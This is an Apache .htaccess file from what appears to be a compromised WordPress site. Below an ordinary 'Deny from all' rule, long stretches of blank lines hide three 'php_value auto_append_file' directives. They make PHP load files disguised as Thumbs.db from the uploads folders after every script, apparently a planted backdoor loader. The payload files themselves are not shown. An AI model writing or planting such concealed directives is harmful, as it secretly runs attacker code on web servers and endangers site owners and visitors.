Order deny,allow
Deny from all


































































































































































































php_value auto_append_file /home/neoxenos/neoxenos.org.BAD/wp-content/blogs.dir/2/files/downloads/Thumbs.db

































































































































































































php_value auto_append_file /home/neoxenos/neoxenos.org.BAD/wp-content/blogs.dir/2/files/downloads/Thumbs.db

































































































































































































php_value auto_append_file /home/neoxenos/neoxenos.org.BAD/wp-content/blogs.dir/2/files/downloads/video/Thumbs.db